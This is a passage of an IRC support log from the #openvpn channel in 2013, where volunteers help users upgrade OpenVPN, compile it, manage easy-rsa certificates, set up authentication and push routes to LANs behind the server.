You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 07:38 -!- kubbing [~kubbing@gprs29.vodafone.cz] has quit [Remote host closed the connection] 07:39 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 07:41 < vaillor> ecrist: http://sprunge.us/TAUP 07:42 <@ecrist> this is an old log 07:42 <@ecrist> Also, you're running an old version of OpenVPN 07:43 < vaillor> i installed it from apt-get 07:43 <@ecrist> it's out of date 07:43 < vaillor> how to upgrade it? 07:45 <@ecrist> !download 07:45 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 07:45 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 07:45 <@ecrist> also, I need a current log 07:45 <@ecrist> the one you posted is 2 days old 07:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 07:46 < vaillor> ihttp://sprunge.us/ZTCH 07:46 < vaillor> http://sprunge.us/ZTCH 07:46 < vaillor> is right 07:46 < vaillor> date and time are wrong on the system 07:47 <@ecrist> fix it 07:49 < vaillor> ecrist, which version of openvpn do i need? 07:49 <@ecrist> 2.3.0 07:49 <@ecrist> see /topic 07:50 < vaillor> ok, let me get and install it 07:52 <@ecrist> fix the time on that box, too 07:54 < vaillor> done 07:54 < vaillor> ecrist, can you explain /why/ do i need that version? 
07:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:54 <@ecrist> vaillor: standard policy that we only support the latest version 08:00 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Remote host closed the connection] 08:00 < vaillor> vaillor: whose standard policy, I mix it for multiple sites at many levels and don't get issues - seems to me something else is wrong 08:01 <@ecrist> our (#openvpn) standard policy 08:01 <@ecrist> there have been a LOT of changes since 2.1.x 08:02 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has quit [Ping timeout: 245 seconds] 08:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:03 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has joined #openvpn 08:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 245 seconds] 08:20 -!- bahzman [~meh@58.34.152.207] has joined #openvpn 08:21 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has quit [Read error: Connection reset by peer] 08:21 -!- Bakz [~meh@210.56.51.163] has quit [Ping timeout: 252 seconds] 08:22 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has joined #openvpn 08:23 < vaillor> ecrist, on windows i shuld use tun or tap? 08:28 <@ecrist> the client needs to match what the server is using 08:28 <@ecrist> in most cases, that's tun 08:29 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 08:29 < TheWarden> !welcome 08:29 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 08:30 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 08:31 < vaillor> ecrist, certs should be created all on server? 08:31 < TheWarden> Hi, I've recently installed OpenVPN and I was successful in authenticating to the VPN. However I want to remove a user I added. I tried running . /etc/openvpn/easy-rsa/2.0/vars and now I'm getting this "-bash: /etc/openvpn/easy-rsa/whichopensslcnf: No such file or directory", how do I fix this? 08:31 -!- Bakou [~meh@58.34.36.134] has joined #openvpn 08:31 <@ecrist> vaillor: why are you re-creating the certs? 08:32 <@ecrist> TheWarden: did you use easy-rsa to generate the certificates, or something else? 08:32 < vaillor> is possible that certs i created yesterday could be broken 08:32 < vaillor> ? 08:32 < TheWarden> ecrist: I only uses easy-rsa 08:32 < TheWarden> used* 08:32 <@ecrist> vaillor: at this point, I don't think so 08:32 <@ecrist> TheWarden: did you use it on the box your trying to use it on now? 08:33 < vaillor> ecrist is there a way to know that certs are good? 08:33 < TheWarden> ecrist: yes I did 08:33 -!- bahzman [~meh@58.34.152.207] has quit [Ping timeout: 252 seconds] 08:34 < TheWarden> I ran that command before so this is why I'm so confused as to why its not working. I just had it working and no changes have been done to it since then. It was just yesterday I set this all up. 08:34 <@ecrist> you didn't run a cleanall at some point, did you? 08:34 < TheWarden> ecrist: yes I believe I did and I just did this morning to be honest. 08:35 <@ecrist> cleanall is bad 08:35 <@ecrist> it deletes your entire CA structure 08:36 < TheWarden> oh crap, well that sucks. Ahh strange as the keys is still present along with the client files I created. 08:36 < TheWarden> I'll re do ca and client again then to fix this? 
08:36 <@ecrist> sounds like that might be the easiest thing to start with 08:36 < TheWarden> ecrist: okay 08:36 <@ecrist> if you have a lot of clients, we can try to get things working 08:37 * ecrist really doesn't like current easy-rsa 08:37 <@ecrist> !ssl-admin 08:37 <@vpnHelper> "ssl-admin" is (#1) if you use freebsd, it is in ports or (#2) svn co https://www.secure-computing.net/svn/trunk/ssl-admin to grab it from svn or (#3) A perl script for managing SSL certificates (being a CA). Makes a good replacement for easy-rsa 08:38 < TheWarden> ecrist: no, I just set it up so there is only one client. Its no trouble to re-do... I just make note to not run that command again. All I wanted to do was re-create the client. 08:40 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has quit [Ping timeout: 260 seconds] 08:42 -!- mezgani [~mezgani@41.140.99.173] has joined #openvpn 08:42 < vaillor> ecrist, can you tell me an how to to complie openvpn 2.3.0 ? 08:43 <@ecrist> download source, cd , ./configure && make && make install 08:44 < rob0> ecrist! You forgot to extract the source from the tarball! How could you be so CRUEL? 08:44 <@ecrist> lol 08:44 -!- p3rror [~mezgani@41.140.169.138] has quit [Ping timeout: 252 seconds] 08:45 -!- sejo [~SeJo@fosdem/staff/sejo] has left #openvpn [] 08:47 < vaillor> checking git checkout... no 08:47 < vaillor> configure: error: lzo enabled but missing 08:49 <@ecrist> you need to have lzo installed, or disable it in your configure command 08:49 <@ecrist> ./configure --help 08:49 -!- vect0rx [vectorx@havok.org] has joined #openvpn 08:50 < TheWarden> Does easy-rsa really need to be installed at /etc/openvpn/easy-rsa? Really it shouldn't be there as it should be stored in say /opt/ or /usr/local/. 08:50 < vaillor> i can install it 08:50 < vaillor> can you tell me the name of the package please? 
08:52 <@ecrist> TheWarden: you can install it anywhere you like, but you might need to edit the scripts for pathing 08:52 < TheWarden> so if I want to revoke/remove a client is i true I would do ". /etc/openvpn/easy-rsa/2.0/vars" then ". /etc/openvpn/easy-rsa/2.0/revoke-full client1" ? 08:52 <@ecrist> one of the things we plan on fixing 08:52 <@ecrist> putting it in /usr/local is canonical across unix OSes 08:52 <@ecrist> correct. 08:52 < TheWarden> ecrist: Oh I see okay, well for now I'll leave it be then. 08:53 < TheWarden> ecrist: ahh okay, thanks. 08:54 < vaillor> liblzo2-dev or liblzo2-2 ? 08:54 < TheWarden> So I have OpenVPN installed and a client installed and working. Which is admittingly really cool and exciting as this is my first VPN I've ever setup. However, my next hurdle is how can I some how make the the VPN authenticate to the domain (active directory)? 08:56 < TheWarden> So saying this, the user would authenticate to the VPN and then automatically be authenticated to the domain. Maybe this is not possible, I dunno. 08:57 < TheWarden> Oh the other thing is, this may not be ideal but the fact is the network the VPN client is connecting to is on 192.168 and the VPN is using 10.8. Presently when the client is authenticated to the VPN the client is not able to access 192.168, how can this be fixed? Yes I've tried ping and that doesn't work. 09:00 < Holiday> TheWarden: I'm no openvpn pro (trust me, some of the guys can attest with the setup/issue I have lol) but I happened across this and didn't know if it'd help you: https://community.openvpn.net/openvpn/wiki/RelatedProjects#Authentication 09:00 <@vpnHelper> Title: RelatedProjects – OpenVPN Community (at community.openvpn.net) 09:01 < TheWarden> Holiday: thanks, I'll have a look. 09:01 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn 09:02 < Holiday> TheWarden: (heck those many be included anymore or something I don't have a clue.. 
and some of the GUI clients for Windows listed there appear to be rather dated and haven't been updated in some time) 09:03 <@ecrist> TheWarden: if you can setup PAM on the openvpn server to auth with active directory, openvpn includes an auth pam module 09:04 < Holiday> ecrist: I'm sure that's a lot easier than maybe this one I found on that link: https://code.google.com/p/openvpn-auth-ldap/ 09:04 <@vpnHelper> Title: openvpn-auth-ldap - LDAP authentication and authorization plugin for OpenVPN 2.x - Google Project Hosting (at code.google.com) 09:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:04 < vaillor> ecrist, finished ./configure && make && make install 09:04 < vaillor> now, what else do i need? 09:05 < TheWarden> ecrist: mmm not sure if I can or not. The system running OpenVPN also is the Active Directory Domain Controller if that helps. 09:05 < TheWarden> Holiday: I was looking at that actually openvpn-auth-ldap but no clue where to begin. If PAM will work and its already built in that sounds better to me. 09:06 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 09:06 < Holiday> yeah the pam method is what we use here for a lot of stuff 09:06 < TheWarden> oh another thing, I know I'm throwing at lot out there at once... where can I get an init.d script for OpenVPN? It works manually right now but I really need an init.d script. I'm running OpenVPN on Debian Squeeze. 09:07 <@ecrist> TheWarden: I've never setup PAM with AD on a windows machine. 09:07 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:08 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 250 seconds] 09:09 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 09:11 < vaillor> ecrist, so? is there a command to install the package after compilation? 09:11 < vaillor> because when i try to run openvpn, i get "command not found" 09:13 < TheWarden> ecrist: oh okay, no problem. 
09:13 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 09:13 < TheWarden> Holiday: so your using PAM to authenticate to Active Directory Domain Controller? 09:14 < TheWarden> vaillor: if OpenVPN is installed, you may need to run with sudo in order for it to work. 09:14 < TheWarden> So is there an init.d script that comes with OpenVPN? I haven't found one as of yet. 09:15 < vaillor> TheWarden, openvpn is not installed 09:15 < vaillor> and i'm as a root 09:15 < TheWarden> vaillor: what OS are you using? 09:15 < rob0> The init.d script, if any, is provided by your OS/distro. 09:17 < vaillor> debian 09:17 < TheWarden> rob0: Oh, well that seems odd to me. Debian does not develop nor is it involved with OpenVPN so I can't see them providing it. I'll have to write one. Shouldn't be too hard as I've done some in the past. 09:17 < TheWarden> vaillor: ahh okay, well I actually just did an install on Debian Squeeze. I following this for the most part, http://wingloon.com/2012/05/25/how-to-install-setup-openvpn-on-debian-6-0-squeeze-with-certificate-authentication/ 09:17 <@vpnHelper> Title: How To Install Setup OpenVPN on Debian 6.0 Squeeze with Certificate Authentication | WING LOON (at wingloon.com) 09:18 < TheWarden> vaillor: keep in mind I said for the most part, it depends on what you want and what your system configuration is and is going to be. 09:20 < rob0> TheWarden, did you look in the Debian openvpn package? 09:20 < TheWarden> rob0: no I haven't but that would be a good start :-), I installed from OpenVPN repository to get the latest stable. 09:21 < vaillor> TheWarden, i downloaded directly 2.3.0 sources 09:21 < vaillor> and compiled them 09:21 < TheWarden> vaillor: oh really, the repository would have been a better option via OpenVPN at least in my opinion. Either way all should be similar, granted if you have experience doing such things before in the past. 09:22 < Holiday> TheWarden: yes but not with OpenVPN (other utilities). 
Our openvpn still isn't 100% yet 09:23 < TheWarden> Holiday: well true, but I got it up and running fairly fast I found. It took time and a lot of reading but it paid off. 09:25 -!- brute11k [~brute@89.249.231.191] has joined #openvpn 09:31 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 09:32 <@ecrist> vaillor: if you ran the make install command, it should be installed 09:32 <@ecrist> depending on your shell, you may need to run "rehash" 09:34 < vaillor> ecrist, make[1]: Leaving directory `/etc/openvpn2/openvpn-2.3.0 09:34 < vaillor> this is the last line of make install 09:35 < vaillor> it means that all went fine? 09:38 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 09:41 -!- mezgani [~mezgani@41.140.99.173] has quit [Quit: Leaving] 09:49 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 09:49 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 09:50 <@ecrist> vaillor: run this - find / -name openvpn -type f 09:54 < vaillor> root@debian-VM:/etc/openvpn2/openvpn-2.3.0# find / -name openvpn -type f 09:54 < vaillor> /usr/local/sbin/openvpn 09:54 < vaillor> /etc/openvpn2/openvpn-2.3.0/src/openvpn/openvpn 09:58 -!- lbft__ is now known as lbft 10:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:05 < TheWarden> When generating the client's crt and key it prompts for "A challenge password". I entered one but I noticed that when the client connects to the VPN it doesn't prompt to input a password. Is this normal behavior? All VPNs I've ever used I've had to input a password or username and password. 
10:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 10:11 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 10:14 < vaillor> TheWarden 10:14 < vaillor> i used your guide 10:15 < vaillor> but when i try to connect i get: 10:15 < vaillor> Tue Mar 12 16:13:29 2013 MANAGEMENT: Socket bind failed on local address [AF_INET]127.0.0.1:25340: Address already in use (WSAEADDRINUSE) 10:15 < vaillor> Tue Mar 12 16:13:29 2013 Exiting due to fatal error 10:16 <@ecrist> vaillor: /usr/local/sbin/openvpn is the binary you want to use then 10:16 <@ecrist> vaillor: let me see your config, please 10:17 -!- raidz_away is now known as raidz 10:18 < vaillor> ecrist: http://pastebin.com/HYP6K2is 10:21 < vaillor> this is server side: http://pastebin.com/x2Fqgpzy 10:21 < TheWarden> vaillor: I think ecrist could help a lot more than me in this area. I may have just lucked out to get mine working but it appears to continue to work without issues. Granted I did edit my router/firewall to do port forwarding as well. Not all things are on that page. 10:22 < vaillor> I'm going crazy :) 10:25 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 10:31 < vaillor> ecrist, i geave you configuration 10:32 < TheWarden> vaillor: can you list the contents of /etc/openvpn ? 10:32 < TheWarden> vaillor: when you uses easy-rsa did you use 1.0 or 2.0? 10:34 < vaillor> 2.0 10:36 < TheWarden> vaillor: okay, well I could be wrong here but I believe the server.conf should change the line # 7 to dh dh2048.pem 10:36 < TheWarden> vaillor: I need to see the contents of /etc/openvpn please, just do a ls -al and then copy/paste the results to a pastebin for me to see. 
10:37 < vaillor> TheWarden 10:37 < vaillor> Tue Mar 12 16:13:29 2013 MANAGEMENT: Socket bind failed on local address [AF_INET]127.0.0.1:25340: Address already in use (WSAEADDRINUSE) 10:37 < vaillor> Tue Mar 12 16:13:29 2013 Exiting due to fatal error 10:37 < vaillor> this is my error 10:37 < TheWarden> vaillor: okay, well lets start where I'm looking at first please. 10:38 < vaillor> what? 10:43 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 10:47 -!- Bakz [~meh@184.75.214.42] has joined #openvpn 10:49 -!- Bakou [~meh@58.34.36.134] has quit [Ping timeout: 250 seconds] 10:49 -!- brute11k [~brute@89.249.231.191] has quit [Ping timeout: 248 seconds] 10:51 < TheWarden> vaillor: okay, can you please run the following command without quotes and copy/paste the results to a pastebin for me to look at, "ls -al". 10:52 <@ecrist> vaillor: it seems you already have openvpn running 10:53 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 10:53 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 264 seconds] 10:53 -!- mattock [~mattock@raidz.im] has joined #openvpn 10:53 -!- mattock [~mattock@raidz.im] has quit [Changing host] 10:53 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 10:54 -!- mode/#openvpn [+o mattock] by ChanServ 10:54 < vaillor> ecrist, is it running 10:54 -!- abec0 [olivier@vvma.net] has quit [Ping timeout: 264 seconds] 10:54 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 264 seconds] 10:54 -!- abec0_ [olivier@vvma.net] has joined #openvpn 10:54 < vaillor> on the server i get "initialization sequence completed 10:54 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 10:55 < vaillor> brb 10:55 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has quit [] 10:57 -!- bahzman [~meh@58.34.36.134] has joined #openvpn 10:57 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 10:57 
< tabakhase> ARG, what is that shit?! - server on unix, clients on unix can connect just fine - windows clients die saying "tls_read_plaintext error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed" - on depth=1 (so the self signed cname=vpn-CA) 10:58 < tabakhase> more fun: another windows box, with an oder openvpn version - seems to connect just fine 10:58 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 10:58 < tabakhase> oder=older 10:58 < vaillor> ecrist: http://pastebin.com/jKwsQ4nC 11:00 -!- Bakz [~meh@184.75.214.42] has quit [Ping timeout: 248 seconds] 11:00 -!- Bakou [~meh@058177188234.ctinets.com] has joined #openvpn 11:02 -!- bahzman [~meh@58.34.36.134] has quit [Ping timeout: 255 seconds] 11:04 -!- Bakz [~meh@58.34.36.134] has joined #openvpn 11:05 < Holiday> can someone give me a clue on what the heck I'm missing.. windows client vpn (tap) to linux box, bridge setup. tcpdump shows traffic (say ping and arp who-has requests) from the vpn client on tap0 and br0, but nothing on eth1 (the card in the bridge) 11:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:05 < Holiday> net.bridge.bridge-nf-call-iptables = 0 (and just in case there's the input -i tap0 -j accept deals in iptables) 11:06 < Holiday> and none of the arp who-has are obviously receiving a reply 11:06 <@dazo> Holiday: why do you bridge? 11:06 <@dazo> tabakhase: http://www.catb.org/~esr/faqs/smart-questions.html#examples 11:06 <@vpnHelper> Title: How To Ask Questions The Smart Way (at www.catb.org) 11:07 < Holiday> dazo: lol you should remember :) Because 1: the main guy wants it as if they were plugged right into the switches because of some of the devel work and applications we have running 11:07 -!- Bakou [~meh@058177188234.ctinets.com] has quit [Ping timeout: 256 seconds] 11:07 < Holiday> and it's beyond my control so I'm working within those constraints 11:07 <@dazo> oh my goodness .... that's you .... okay .... 
then I have no idea :) 11:08 < Holiday> lol 11:08 < tabakhase> dazo if i had an idea what more info could be helpfull... im stuck on "having clients that work" so it dosnt realy seem to be a configuration problem... 11:08 < tabakhase> been hoping for a "yes, new win version needs cert in form XY and it will work" or a simillar punchline i missed... 11:08 <@ecrist> tabakhase: full logs from non-working client, please 11:08 < Holiday> dazo: I think I picked your brain a few times before.. still hung up and he still won't go TUN :( 11:08 <@dazo> Holiday: you can go that guy and quote me: Grow up and start setting up networking in a better way - by using routing 11:09 < vaillor> dazo: http://pastebin.com/jKwsQ4nC 11:09 <@dazo> Holiday: and if doesn't accept it .... then another quote from me: You're a lost case 11:09 < vaillor> can you check this please? 11:10 < Holiday> dazo: I did try to look into the TUN, but if I go that route I'll still need to get the clients into a .126-145 IP range.. since it's still all public IP's 11:10 <@dazo> tabakhase: no, certificate formats have not changed ... in fact, it's all standard X.509 certificates, PEM formatted 11:10 < Holiday> dazo: I wish you could just trout slap him for me lol 11:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 11:10 * dazo goes to his freezer and pulls out a big frozen trout 11:11 <@dazo> tabakhase: so then you're back at reading the topic ... which explains all we need here 11:11 <@EugeneKay> Ooooh, trout! 11:11 < tabakhase> ecrist also want the certs themself? its allll in http://nopaste.info/c2debc94a2.html 11:11 * EugeneKay gets fresh lemon and seasonings 11:11 < Holiday> dazo: honestly it's not much skin off of my back.. 
if this doesn't work soon (either openvpn or ipsec/l2tp the way *he wants*, the other guy is just going to pull the trigger and get the vpn add-ons for the checkpoint firewall lol) 11:11 < Holiday> but still I just wanted to say I appreciated all the past help I received 11:12 < Holiday> err other guy = another guy 11:12 <@ecrist> tabakhase: no, do not give me certs 11:12 < vaillor> i spent 6 days trying to configure a client and server vpn, why is it so difficult? 11:12 <@EugeneKay> Holiday - the fact that you're using something called "Checkpoint Firewall" is an indication that you should run like fuck from the project 11:12 <@EugeneKay> vaillor - because you are an idiot who doesn't know how to read 11:12 <@ecrist> EugeneKay++ 11:12 < tabakhase> ecrist so skip lines 28 till 74 in the paste ;-) 11:12 < Holiday> EugeneKay: They were using the cisco's but recently upgraded to the checkpoints (that was the security guys not me) 11:13 < vaillor> EugeneKay, i follow 5 howto, but i always get errors 11:13 < vaillor> every kind of error 11:13 <@EugeneKay> vaillor - I really don't care anymore 11:13 < vaillor> ecrist, have you seen the config you asked me? 11:13 <@EugeneKay> vaillor - at this point you're just being a help vampire. Go back and try to understand what is going on, but please, stop trying to get us to do it for you 11:14 <@EugeneKay> Because we won't. 11:14 < vaillor> EugeneKay, i'd like to configure this little client-server config and i'll be away forever, he problem is that nothing works 11:15 <@dazo> tabakhase: what about your server certificate? 11:16 <@ecrist> tabakhase: upgrade your openvpn client 11:16 <@ecrist> you're using 2.0.9, you need to use 2.3.0 11:16 <@ecrist> !download 11:16 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. 
It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 11:16 <@dazo> EugeneKay: join the club krzee and I started .... just /ig vaillor ... it'll give you peace 11:16 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 11:16 < tabakhase> dazo thats "Subject: C=DE, ST=Berlin, L=Berlin, O=eKomi Ltd., CN=sid.ekomi.de/emailAddress=hostmaster@ekomi.de" - "Issuer: C=DE, ST=Berlin, L=Berlin, O=eKomi Ltd., CN=eKomi sid-vpn ROOT CA/emailAddress=hostmaster@ekomi.de" -- all formed with pkitool 11:16 <@EugeneKay> dazo - I can do one better than that 11:16 < TheWarden> What do I have to change in my OpenVPN configuration to allow the authenticated client to be able to access the network? Presently I'm able to connect in as a client successfully but I can only ping the OpenVPN server, nothing else on the network is accessible. 11:17 -!- mode/#openvpn [+q *!*@2-226-37-187.ip179.fastwebnet.it] by EugeneKay 11:17 <@EugeneKay> !route 11:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 11:17 <@dazo> tabakhase: that looks like your CA certificate 11:17 <@EugeneKay> TheWarden ^ 11:17 <@vpnHelper> behind the server or client 11:17 <@ecrist> TheWarden: you need to push routes for your remote LAN to the VPN clients 11:18 <@dazo> tabakhase: do not ever confuse CA and server certificates .... and as ecrist said ... 
upgrade your client too 11:18 <@dazo> 2.0 isn't too happy with 2.1, and most likely even less happy with 2.2 and 2.3 11:18 <@EugeneKay> What the heck is still on 2.0 11:18 <@EugeneKay> RHEL5 & derivatives? 11:19 <@dazo> EugeneKay: Debian stable, I belive too 11:19 <@dazo> But EL5 can get the remedy by installing EPEL 11:19 <@EugeneKay> Or by upgrading to 6 11:19 < TheWarden> ecrist: so I just edit the server.conf and add something like push "route 192.168.0.1 255.255.255.0" ? I'm not sure if the first IP is suppose to be. 11:19 <@dazo> EugeneKay: yeah, but far bigger operation than installing EPEL ;-) 11:19 < uberushaximus> nope 11:19 < uberushaximus> debian stable is on 2.1 11:20 < tabakhase> setupping 2.3.... 11:20 < uberushaximus> backports has 2.2 11:20 <@EugeneKay> TheWarden - that should be the netmask of the network you're trying to grant access to 11:20 < tabakhase> and i dont mixed any certs, thers a selfsigned CA that signed server (sid.ekomi.de) and client (chackmann) 11:20 <@dazo> EugeneKay: but in this case .... it's a Windows user .... 11:20 <@dazo> OpenVPN 2.0.9 Win32-MinGW 11:20 <@ecrist> tabakhase: start with an updated client 11:21 <@EugeneKay> Oh dear god, I bet he's using the old .se thing 11:21 <@EugeneKay> !download 11:21 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 11:21 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 11:21 <@ecrist> EugeneKay: you should really try to keep up 11:21 <@EugeneKay> Too much clicking 11:21 <@dazo> heh 11:21 < tabakhase> ecrist thats what im doing... 
[17:18:59] setupping 2.3... 11:22 <@EugeneKay> Well there you go 11:23 < tabakhase> WORKS LIKE A CHARM! - you remember, thers been a reason i didnt started of with pasting tons of logs... i knew its a individual client problem (as i had other clients running fine) 11:23 < tabakhase> still i see, 90% of the guys "knowing whts the problem" actually dont ;D 11:25 <@ecrist> tabakhase: we wouldn't have known you needed to update without the log 11:26 < TheWarden> EugeneKay: right so 192.168.0.0 255.255.255.0 mmm still not working. 11:26 <@EugeneKay> !serverlan 11:26 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 11:26 < tabakhase> ecrist fair point, still it could be the first quick shot - just like "did you powered it on & pluged the cable in" ;-) 11:26 <@EugeneKay> Follow the chart ^ 11:27 < TheWarden> I setup the router to port forward to the OpenVPN server I wonder if that is not done correctly. I can connect fine to the VPN server. mmm 11:27 <@EugeneKay> The chart knows all 11:28 <@ecrist> tabakhase: did you read /topic when you joined the channel? 11:28 <@ecrist> right in /topic it says what the current version is - yours was only 7 years out of date 11:29 < tabakhase> ecrist using a bouncer, im in here for moths ;-) should gave a //topic # to refresh... 11:29 <@EugeneKay> Sane bouncers/clients will display the /topic when you start it up 11:29 <@EugeneKay> Mine does. 11:30 <@ecrist> tabakhase: the truth is, I ask for !logs right away. 
The first thing I look at is the openvpn version string 11:30 <@ecrist> then I look to other issues 11:31 <@ecrist> I've had people using 2.0.9 tell me they were using "most current" version, but as EugeneKay suggested, they got their client from openvpn.se, instead of the official repo 11:31 <@ecrist> there really is a method to my madness 11:31 <@EugeneKay> People are idiots. 11:32 < tabakhase> i think ive strummpled above openvpn.net because the fakeshit private tunnel they try to sneak on machines 11:32 <@EugeneKay> .net is the official site 11:32 < uberushaximus> olo 11:32 <@EugeneKay> AS/PrivateTunnel is the commercial thing 11:33 <@ecrist> they sneak private tunnel onto machines???? 11:33 <@ecrist> fakeshit? 11:33 <@EugeneKay> No, just people who can't read. 11:33 < tabakhase> i guess the count "people getting scamwared by this" is >9000 11:33 <@ecrist> tabakhase: wtf are you talking about? 11:34 <@EugeneKay> It would be nice if the front page was clearer about the difference between AS/PT and GPL(some actual text would be nice), but hey 11:34 < tabakhase> ecrist from the fact that noone will ever get the idea to go to the community tab when just looking for the "software openvpn" when theres already a huge download button 11:35 < tabakhase> community? forums? no, i want a download, not a discussion... 11:36 <@ecrist> that's hardly scamware, but I see your point 11:36 <@ecrist> it's better than it used to be 11:36 < TheWarden> !ipforward 11:36 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 11:37 < tabakhase> so what do we have? 
viruses on download.com, stoneage software on openvpn.se (that seeemd like they tried to solve the issue of no nice to find download) and nicely hidden download on the producers website 11:37 <@EugeneKay> Feel free to complain to somebody who can do something about it 11:37 <@EugeneKay> IE, not us. 11:38 < tabakhase> ^^ 11:38 < TheWarden> !route_outside_openvpn 11:38 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 11:38 < TheWarden> !route 11:38 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 11:38 <@vpnHelper> behind the server or client 11:42 -!- copper [~copper@unaffiliated/copper] has joined #openvpn 11:43 -!- newbie is now known as TMcTrain 11:43 < copper> hi 11:44 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has quit [Quit: Hey! Where'd my controlling terminal go?] 11:44 < copper> I asked a while ago about the battery consumption of the android app 11:44 < copper> I was directed to the FAQ and I changed my config to "keepalive 30 